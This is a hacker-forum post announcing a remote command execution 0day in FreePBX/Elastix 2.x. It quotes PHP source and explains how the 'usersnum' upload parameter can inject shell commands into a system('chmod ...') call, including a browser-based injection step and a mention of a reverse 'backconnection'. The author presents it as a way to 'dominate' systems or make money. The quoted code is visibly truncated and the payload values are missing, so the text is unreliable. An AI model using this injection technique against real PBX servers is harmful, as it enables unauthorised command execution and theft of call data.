HackerTop - View topic - Elastix PBX 2.x.x Remote Command Execution 0day Exploit
View unanswered posts | View active topics It is currently Sat Jul 20, 2019 2:00 pm

Reply to topic  [ 1 post ] 
 Elastix PBX 2.x.x Remote Command Execution 0day Exploit 
Author Message
Site Admin
User avatar

Joined: Sun Jul 24, 2016 6:44 am
Posts: 18
Reply with quote
App : Freepbx 2.x
Download : schmoozecom.net
Auther : i-Hmx
Mail : [email protected]
Home : security arrays inc. , sec4ever.com , exploit4arab.net

And again , while the distro is widely user , Schmoozecom staff not giving
it enough attention ,
all they provided for the distro is adding the schmoozecom fancy logo and
"Developed by schmoozecom" Teraraa :/
What ever,
Freepbx suffer from another command execution vuln , not so critical but
perhaps many people gonna be interested abt it
as it can be used to dump plaintext data from the PBX Box ;)

Vulnerable function "recording_addpage" @
function recording_addpage($usersnum) {
    global $fc_save;
    global $fc_check;
    global $recordings_save_path;

    <div class="content">
    <h2><?php echo _("System Recordings")?></h2>
    <h3><?php echo _("Add Recording") ?></h3>
    <h5><?php echo _("Step 1: Record or upload")?></h5>
    <?php if (!empty($usersnum)) {
    echo '<p>';
        echo _("Using your phone,")."<a href=\"#\" class=\"info\">"._("
dial")."&nbsp;".$fc_save." <span>";
        echo _("Start speaking at the tone. Press # when
        echo _("and speak the message you wish to record. Press # when
    echo '</p>';
    } else { ?>
        <form name="xtnprompt" action="<?php $_SERVER['PHP_SELF'] ?>"
        <input type="hidden" name="display" value="recordings">
        echo _("If you wish to make and verify recordings from your phone,
please enter your extension number here:"); ?>
        <input type="text" size="6" name="usersnum" tabindex="<?php echo
++$tabindex;?>"> <input name="Submit" type="submit" value="<?php echo
_("Go"); ?>" tabindex="<?php echo ++$tabindex;?>">
    <?php } ?>
    <form enctype="multipart/form-data" name="upload" action="<?php echo
$_SERVER['PHP_SELF'] ?>" method="POST">
        <?php echo _("Alternatively, upload a recording in any supported
asterisk format. Note that if you're using .wav, (eg, recorded with
Microsoft Recorder) the file <b>must</b> be PCM Encoded, 16 Bits, at
        <input type="hidden" name="display" value="recordings">
        <input type="hidden" name="action" value="recordings_start">
                <input type="hidden" name="usersnum" value="<?php echo
$usersnum ?>">
        <input type="file" name="ivrfile" tabindex="<?php echo
        <input type="button" value="<?php echo _("Upload")?>"
onclick="document.upload.submit(upload);alert('<?php echo
addslashes(_("Please wait until the page reloads."))?>');" tabindex="<?php
echo ++$tabindex;?>"/>
    if (isset($_FILES['ivrfile']['tmp_name']) &&
is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
    if (empty($usersnum) || !ctype_digit($usersnum)) {
            $dest = "unnumbered-";
        } else {
            $dest = "{$usersnum}-";
        $suffix =
"."), 1));
        $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
        move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
        system("chgrp " . $amp_conf['AMPASTERISKGROUP'] . " " .
        system("chmod g+rw ".$destfilename);
        echo "<h6>"._("Successfully uploaded")."
        $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
    } ?>
    <form name="prompt" action="<?php $_SERVER['PHP_SELF'] ?>"
method="post" onsubmit="return rec_onsubmit();">
    <input type="hidden" name="action" value="recorded">
    <input type="hidden" name="display" value="recordings">
    <input type="hidden" name="usersnum" value="<?php echo $usersnum ?>">
    if (!empty($usersnum)) { ?>
        <h5><?php echo _("Step 2: Verify")?></h5>
        <p> <?php echo _("After recording or
uploading,")."&nbsp;<em>"._("dial")."&nbsp;".$fc_check."</em> "._("to
listen to your recording.")?> </p>
        <p> <?php echo _("If you wish to re-record your message,
dial")."&nbsp;".$fc_save; ?></p>
        <h5><?php echo _("Step 3: Name")?> </h5> <?php
    } else {
        echo "<h5>"._("Step 2: Name")."</h5>";
    } ?>
    <table style="text-align:right;">
        <tr valign="top">
            <td valign="top"><?php echo _("Name this Recording")?>: </td>
            <td style="text-align:left"><input type="text" name="rname"
value="<?php echo $rname; ?>" tabindex="<?php echo ++$tabindex;?>"></td>

    echo _("Click \"SAVE\" when you are satisfied with your recording");
    echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n"; ?>
    <input name="Submit" type="submit" value="<?php echo _("Save")?>"
tabindex="<?php echo ++$tabindex;?>"></h6>
    <?php recordings_form_jscript(); ?>

Actually as you can see there are many exploitable lines there , but here
am interested about this line
system("chmod g+rw ".$destfilename);

if you traced the function flow you will notice that 'destfilename' get
part of his value from the parameter $_REQUEST['usersnum']
the function is called via

before uploading open firebug
search for usersnum
edit value to
or , for backconnetion use

and you are ready to dominate , or even make some $$ if you r interested ;)
Have a good day

Sun Jul 24, 2016 11:49 am
Display posts from previous:  Sort by  
Reply to topic   [ 1 post ] 

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Copyright © 2003-2016 HackerTop. All rights reserved.
Privacy & Cookies Policy
Community Forum Software by phpBB